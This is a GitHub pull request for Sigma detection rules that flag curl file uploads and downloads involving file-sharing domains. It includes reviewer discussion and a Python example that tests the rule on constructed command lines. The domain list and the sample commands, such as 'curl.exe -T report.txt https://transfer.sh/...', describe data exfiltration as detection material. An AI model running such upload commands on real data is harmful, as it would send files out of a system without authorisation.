
update: suspicious file activity related to file sharing websites #5574

Open
swachchhanda000 wants to merge 5 commits into SigmaHQ:master from swachchhanda000:curl_bashupload

Conversation

@swachchhanda000
Collaborator

Summary of the Pull Request

Changelog

new - Curl File Upload To File Sharing Websites
update - Suspicious Remote AppX Package Locations - add more file sharing domains
update - BITS Transfer Job Download From File Sharing Domains - add more file sharing domains
update - Suspicious File Download From File Sharing Websites - File Stream - add more file sharing domains
update - Unusual File Download From File Sharing Websites - File Stream - add more file sharing domains
update - New Connection Initiated To Potential Dead Drop Resolver Domain - add more file sharing domains
update - Network Communication Initiated To File Sharing Domains From Process Located In Suspicious Folder - add more file sharing domains
update - Network Connection Initiated From Process Located In Potentially Suspicious Or Uncommon Location - add more file sharing domains
update - Suspicious Download From File-Sharing Website Via Bitsadmin - add more file sharing domains
update - Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE - add more file sharing domains
update - Suspicious File Download From File Sharing Domain Via Curl.EXE - add more file sharing domains
update - Potentially Suspicious File Download From File Sharing Domain Via PowerShell.EXE - add more file sharing domains
update - Suspicious File Download From File Sharing Domain Via Wget.EXE - add more file sharing domains


@github-actions github-actions bot added Rules Windows Pull request add/update windows related rules labels Aug 1, 2025
Comment on lines +21 to +33
- '0x0.st'
- 'bashupload.com'
- 'chunk.io'
- 'file.io'
- 'filebin.net'
- 'pastebin'
- 'send.firefox.com'
- 'temp.sh'
- 'transfer.sh'
- 'ufile.io'
- 'uploadfiles.io'
- 'wetransfer.com'
- 'x0.at'
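Review bot: `'pastebin'` on the sixth line of this list is the only entry without a TLD, so it matches any string containing that substring rather than a specific upload host; either qualify it the way the other entries are (for example `'pastebin.com'`) or add a comment explaining why a bare substring is intended here. As raised in the thread, the list is also shorter than the file-sharing lists the other rules in this PR maintain, so confirm which hosts accept uploads via curl and add them.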
Member

You literally just updated other lists that are bigger. Please add them.

Collaborator Author

Well, I only added the domains that have documentation confirming curl support. Some domains are just for downloads, like cdn.discordapp.com. But I’ll check again to see if I missed any domains.

Collaborator Author

And btw, some of the pre-existing domains in these rules are dead/not reachable, like anonfiles.com. Should I remove them as well?

Member

Depends on their actual use, I would say. If you still find samples on VT still communicating with them, we keep them in the proc creation related rules, since it would highly mean they are bad.

@nasbench nasbench added the Author Input Required changes the require information from original author of the rules label Aug 29, 2025
@nasbench nasbench self-assigned this Aug 29, 2025
Member

@nasbench nasbench left a comment

Double check my comment before merging

@nasbench nasbench added Ready to Merge and removed 2nd Review Needed Author Input Required changes the require information from original author of the rules labels Nov 12, 2025
@nasbench nasbench added this to the Sigma-December-Release milestone Nov 12, 2025
- ' -X POST'
- ' --request POST '
- CommandLine|re:
- '\s-[FTd]\s' # We use regex to ensure a case sensitive argument detection
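Review bot: the regex `\s-[FTd]\s` on the last line requires whitespace after the flag letter, so curl's attached-value form of the same short options (`-Ffile=@...`, `-Tfile`) is not matched; `\s-[FTd]` without the trailing `\s` covers that form while still excluding the lower-case `-f`, `-t` and upper-case `-D`, which is the case-sensitivity the comment on that line is after. Also, `' -X POST'` has no trailing space while `' --request POST '` does; align the two entries so both spellings of the explicit POST are treated the same way.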
Member

We have the `cased` modifier for it, but not sure many backends support it by now 🐈‍⬛

Collaborator

We should start using it imo. This should be handled by the backend/pySigma.
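As an added example (not SigmaHQ's or the author's code), a Python approximation of the curl upload rule's selection logic, run over constructed command lines to show why the `-F`/`-T`/`-d` check has to be case-sensitive: a case-insensitive check of the same pattern also fires on the download-only flags `-f` and `-D`. The domain subset and the regex come from the hunks above; the `Image` check and the sample events are assumptions.

```python
import re

# Added example (not SigmaHQ's code): a Python approximation of the rule's
# selection logic, used to show why the curl flag check must be case-sensitive.
# Sigma `contains` is case-insensitive, while `re` is case-sensitive by default.
UPLOAD_DOMAINS = ("0x0.st", "bashupload.com", "file.io", "transfer.sh")
POST_MARKERS = (" -x post", " --request post ")            # compared lower-cased
FLAG_RE = re.compile(r"\s-[FTd]\s")                         # upload flags -F, -T, -d
FLAG_RE_NOCASE = re.compile(r"\s-[FTd]\s", re.IGNORECASE)   # what `contains` would do


def matches_rule(event: dict, case_sensitive: bool = True) -> bool:
    """Return True if the process-creation event would trigger the rule."""
    cmd = event["CommandLine"]
    low = cmd.lower()
    if not event["Image"].lower().endswith("\\curl.exe"):   # assumed Image filter
        return False
    if not any(domain in low for domain in UPLOAD_DOMAINS):
        return False
    explicit_post = any(marker in low for marker in POST_MARKERS)
    flag_re = FLAG_RE if case_sensitive else FLAG_RE_NOCASE
    return explicit_post or flag_re.search(cmd) is not None


# Constructed sample events; none of these are real telemetry.
CURL = r"C:\Windows\System32\curl.exe"
SAMPLE_EVENTS = [
    {"Image": CURL, "CommandLine": 'curl.exe -F "file=@report.txt" https://bashupload.com/'},
    {"Image": CURL, "CommandLine": "curl.exe -f -s https://bashupload.com/abc/report.txt -o report.txt"},
    {"Image": CURL, "CommandLine": "curl.exe -T report.txt https://transfer.sh/report.txt"},
    {"Image": CURL, "CommandLine": "curl.exe -D headers.txt https://file.io/abc123"},
    {"Image": CURL, "CommandLine": "curl.exe -X POST -d @report.txt https://0x0.st"},
    {"Image": CURL, "CommandLine": "curl.exe -s https://example.org/index.html"},
]


def evaluate(events, case_sensitive: bool = True) -> list:
    """Apply the rule to each event and return the list of verdicts."""
    return [matches_rule(e, case_sensitive) for e in events]


if __name__ == "__main__":
    # Events 2 and 4 use -f (fail silently) and -D (dump headers), which are
    # downloads, not uploads: only the case-sensitive check keeps them out.
    print("case-sensitive  :", evaluate(SAMPLE_EVENTS, True))
    print("case-insensitive:", evaluate(SAMPLE_EVENTS, False))
```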

@phantinuss phantinuss added Review Needed The PR requires review and removed Ready to Merge labels Nov 21, 2025

@@ -21,8 +21,11 @@ detection:
EventID: 854
Path|contains:
- '.githubusercontent.com' # Includes both gists and github repositories / Michael Haag (idea)
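Review bot: the hunk header says three lines were added here, but only the unchanged `EventID: 854` / `Path|contains:` context is visible, so the new entries cannot be compared against the domain lists in the other rules this PR touches; as both reviewers ask in the thread, add a `related:` entry with `type: similar` pointing at the process-creation rule (and vice versa) so these duplicated lists are maintained together rather than drifting apart.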
Collaborator

All lists (such as here) that are the same and that should be maintained together should be linked in the metadata as "similar".

Member

All the rules should add a `related` similar to at least one rule.

@phantinuss phantinuss added the Author Input Required changes the require information from original author of the rules label Nov 21, 2025
Member

@frack113 frack113 left a comment

Need to link the rules with like proc_creation_win_curl_upload_file_sharing_websites.yml
